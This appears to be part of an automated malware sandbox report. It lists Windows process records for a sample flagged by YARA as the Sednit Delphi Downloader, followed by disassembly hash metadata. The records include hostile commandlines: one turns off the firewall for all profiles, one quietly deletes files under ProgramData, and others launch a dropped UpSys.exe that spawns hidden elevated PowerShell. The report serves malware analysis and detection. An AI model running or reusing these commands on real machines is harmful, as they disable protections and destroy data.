                                                                  Start time:03:58:58
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:53
                                                                  Start time:03:58:58
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:54
                                                                  Start time:03:58:59
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:55
                                                                  Start time:03:58:59
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:56
                                                                  Start time:03:58:59
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:59
                                                                  Start time:03:59:07
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003B.00000003.506427329.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003B.00000002.553935491.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                  General

                                                                  Target ID:61
                                                                  Start time:03:59:13
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                  Imagebase:0x7ff783d30000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET

                                                                  General

                                                                  Target ID:62
                                                                  Start time:03:59:14
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:63
                                                                  Start time:03:59:19
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6524 -s 1860
                                                                  Imagebase:0x7ff7164b0000
                                                                  File size:494488 bytes
                                                                  MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:64
                                                                  Start time:03:59:25
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000040.00000003.551347186.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000040.00000002.628202386.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                  General

                                                                  Target ID:65
                                                                  Start time:03:59:25
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7004 -s 2508
                                                                  Imagebase:0x7ff7164b0000
                                                                  File size:494488 bytes
                                                                  MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:68
                                                                  Start time:03:59:35
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\netsh.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                  Imagebase:0x7ff75dd50000
                                                                  File size:92672 bytes
                                                                  MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:69
                                                                  Start time:03:59:38
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000045.00000003.585994097.0000000003081000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                                  General

                                                                  Target ID:70
                                                                  Start time:03:59:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000046.00000003.606223139.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                                  General

                                                                  Target ID:72
                                                                  Start time:04:00:07
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                  Imagebase:0x7ff620040000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET

                                                                  General

                                                                  Target ID:73
                                                                  Start time:04:00:07
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FFEBCB2617C Relevance: .1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0c8420b1e08a971473d0335b6095064d6a07a79c45a980581b4e3edd8b1fca5
                                                                    • Instruction ID: 548e6ed846f1541ccebbda0cec15539662e7061bf75855e71135d0a32d60e72b
                                                                    • Opcode Fuzzy Hash: e0c8420b1e08a971473d0335b6095064d6a07a79c45a980581b4e3edd8b1fca5
                                                                    • Instruction Fuzzy Hash: E631813091CB4C8FDB189B5C984A6A97BE0FB99721F00422FE449D3652DB70B8558BC2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB26A7C Relevance: .1, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0502ab43fa740d60939666ed61fb45d3e6c754e800008670330406dfeea73ea
                                                                    • Instruction ID: ceb55469ebeee96be3ea6bfaf468da47bf195b2a5d207f4525117247ccf927f6
                                                                    • Opcode Fuzzy Hash: b0502ab43fa740d60939666ed61fb45d3e6c754e800008670330406dfeea73ea
                                                                    • Instruction Fuzzy Hash: 1F21F63090C64C4FEB59DF9C984A7E97FF4EB96320F00426FD449C7162DA74A41ACB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB28DF5 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43beb35496efee78489ecaff5c4f14a4087eed54bff69a95605ad17f80703d92
                                                                    • Instruction ID: 607c3d775e4eab49d879ec794935d78bd612ce03919226e8621c87aadeba1f56
                                                                    • Opcode Fuzzy Hash: 43beb35496efee78489ecaff5c4f14a4087eed54bff69a95605ad17f80703d92
                                                                    • Instruction Fuzzy Hash: B3212831A1891C8FDF94EF5CC481EEDBBA1EF68314F6401A9D409E7292CA25EC81CBC1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB29F5C Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a841d19446c9858932f149c15bdb66924bef1d201ec3e8f9b6f457276441f7bc
                                                                    • Instruction ID: 5569caf7b9a913787c4c17f8c2cbfa642efad51df1dfa3f33d164c1cf89b9443
                                                                    • Opcode Fuzzy Hash: a841d19446c9858932f149c15bdb66924bef1d201ec3e8f9b6f457276441f7bc
                                                                    • Instruction Fuzzy Hash: BF212631A4891D8FDF94EF5CC085EEDB7A1EF68310F640169D409D7292CA24E881CBC1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB272C8 Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a78593fa0f6294289a81616f7718a07788c64e8a5bf6b88efdf4f199ebf9b0c6
                                                                    • Instruction ID: 0ce567096e5e3785a9e237e648e7048bc59c5e113b39cf04cde827f7e6c62990
                                                                    • Opcode Fuzzy Hash: a78593fa0f6294289a81616f7718a07788c64e8a5bf6b88efdf4f199ebf9b0c6
                                                                    • Instruction Fuzzy Hash: 7F01443135CA084FE78CEA1CD492AB573E1EB99324B60016EE44BC76A7DE27E843C745
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB21355 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07619f96095842d0c0f02c34c889d0c1dabf1ee130f3815c66c06bac9d50aba9
                                                                    • Instruction ID: f9ed4d96bb410a36a68a4e10d1fe415d83d4c6b7b05c873c1e70280a6532a5a7
                                                                    • Opcode Fuzzy Hash: 07619f96095842d0c0f02c34c889d0c1dabf1ee130f3815c66c06bac9d50aba9
                                                                    • Instruction Fuzzy Hash: F301677115CB4C4FD744EF0CE451AA6B7E0FB99324F10056DE58AC7661DA36E881CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB29C4E Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 225ea78d211ea3a9a3b640e01eb10f5f2b5d0275c1b3850f98732c1b95fc10ca
                                                                    • Instruction ID: 8f8413d7a6e7dae406588abd37a1bfeb70f726371851d22fc13cccc009c2edc0
                                                                    • Opcode Fuzzy Hash: 225ea78d211ea3a9a3b640e01eb10f5f2b5d0275c1b3850f98732c1b95fc10ca
                                                                    • Instruction Fuzzy Hash: 6AF0B431B5CA084FDB4CAE0CE4825B973D1EB99320B50053EE48FC3696D927E846C681
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB28AEE Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c20ba3d19949e9a773e085ac4a5c2241ccef016aa2df436bf7c61fe6e4c32a2
                                                                    • Instruction ID: fbfc36231f7a80eeeaf8092f10ca19b710176370e8905718ef70a64fc1335d51
                                                                    • Opcode Fuzzy Hash: 8c20ba3d19949e9a773e085ac4a5c2241ccef016aa2df436bf7c61fe6e4c32a2
                                                                    • Instruction Fuzzy Hash: 98F0B43275CA088FDB5CAA0CE4829B873D1EB99320B50053EE48FC2296DD27E846C641
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB29C60 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e33670e320bc02553ed9c4772f89b76e3d20ffddcd0384d2b409f972e9486fd5
                                                                    • Instruction ID: bb52065b919fbfd22b582bf41811809fe21df97342b7e8624ecb901a13d5a60c
                                                                    • Opcode Fuzzy Hash: e33670e320bc02553ed9c4772f89b76e3d20ffddcd0384d2b409f972e9486fd5
                                                                    • Instruction Fuzzy Hash: 3EF0373275CA044FDB4CAA1CF8429B573D1E799334B50016EE48BC2657DD16E8478685
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB28AFF Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfaf86cc4aeba7926face29703d6c96a29f92b750e8ebed4a6432e149c5f5daa
                                                                    • Instruction ID: 42a8347c072972e2511633df6eb0ec28e9a07780593299809fd1acd62a1f4a36
                                                                    • Opcode Fuzzy Hash: bfaf86cc4aeba7926face29703d6c96a29f92b750e8ebed4a6432e149c5f5daa
                                                                    • Instruction Fuzzy Hash: 62F0E53376CB844FDB1CAA2CB8834B4B7D1DB4623175000AFE586C6557D817E447828A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCB266D8 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.676747630.00007FFEBCB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCB20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcb20000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c8cd2370530d44013c5ad06a222ea218975249a7c998f58600acc78fb316a41
                                                                    • Instruction ID: f24aa8c9fcf4a468b0d786cc65b3d000bc61b99d016f0b45e4eb504adcfb1d79
                                                                    • Opcode Fuzzy Hash: 7c8cd2370530d44013c5ad06a222ea218975249a7c998f58600acc78fb316a41
                                                                    • Instruction Fuzzy Hash: 12F0B43584C68D8FCB0ADF2C88559D97FA0EF26210B0502EBE458C71B2DB759858CBD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCBF4155 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.677633339.00007FFEBCBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCBF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcbf0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25cd8c41a630cf8e73c73d19684e4efb5f6d910659e4b45af222e256df3189a5
                                                                    • Instruction ID: f19ac2a64d76c64027ca6904005a8eeafa3c4fe1a397340c29b9ade96a2306d3
                                                                    • Opcode Fuzzy Hash: 25cd8c41a630cf8e73c73d19684e4efb5f6d910659e4b45af222e256df3189a5
                                                                    • Instruction Fuzzy Hash: 3EF0B432A4C9494FE75CEA1CE4816E877E0EF59330F1405BAE28EC71B3CE29AC448780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCBF4403 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.677633339.00007FFEBCBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCBF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcbf0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 483aa9136c50860fb8c46f2f24a3901e86c8ae0785f69e0452c0119dc48402a1
                                                                    • Instruction ID: 574ba1ab9e80eafe819c20ba12ef7f4934365aeeac252f3b83ad9f267019fd9f
                                                                    • Opcode Fuzzy Hash: 483aa9136c50860fb8c46f2f24a3901e86c8ae0785f69e0452c0119dc48402a1
                                                                    • Instruction Fuzzy Hash: 3BF03032A0C4188FD758EA0CE4819E877E0EF59730B5101B6E28EC7563CE26EC548790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCEB07B8 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.684724246.00007FFEBCEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCEB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebceb0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c2b6d5823b4ef8bff7b1048820b70a55bc17bdd1f100ffc1834956b61d3c0ff
                                                                    • Instruction ID: 9fd6a4837ed505db28f407f3553430f519a56b5ee1372fa4c22486ee56295c81
                                                                    • Opcode Fuzzy Hash: 7c2b6d5823b4ef8bff7b1048820b70a55bc17bdd1f100ffc1834956b61d3c0ff
                                                                    • Instruction Fuzzy Hash: 7EE09272A4DA688FEB50EAACA4855F8F7E0EB08331B0801BBD609E3552C920A8548B44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCEB07E3 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.684724246.00007FFEBCEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCEB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebceb0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e3c9211fcc9c357da569288216f8a1e1a8f88b8b7b5312b03bbab4a9d2e19b02
                                                                    • Instruction ID: f4dda834066ec3d47575512815a838f171ffe9d939f2c442c041c8e824ff6efb
                                                                    • Opcode Fuzzy Hash: e3c9211fcc9c357da569288216f8a1e1a8f88b8b7b5312b03bbab4a9d2e19b02
                                                                    • Instruction Fuzzy Hash: 33E04F32E0EA5C8FEB41B7A868551ECFBE0FF49275B1800BBD108D2152D929A8458B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFEBCBF6D33 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.677633339.00007FFEBCBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBCBF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffebcbf0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23743d59ae1fc481c8c337b516371f01e297d2160b7f61db67f46878e04e6367
                                                                    • Instruction ID: f884121dfdfd7c51a134aa53ad945d2c0ef2d225fb4826e8237d5157fb96afbd
                                                                    • Opcode Fuzzy Hash: 23743d59ae1fc481c8c337b516371f01e297d2160b7f61db67f46878e04e6367
                                                                    • Instruction Fuzzy Hash: 9AE0DF32E0DA5C8FEB42ABA858020ECB7E0FF49235B1800BBC008D2153D92A98058B10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%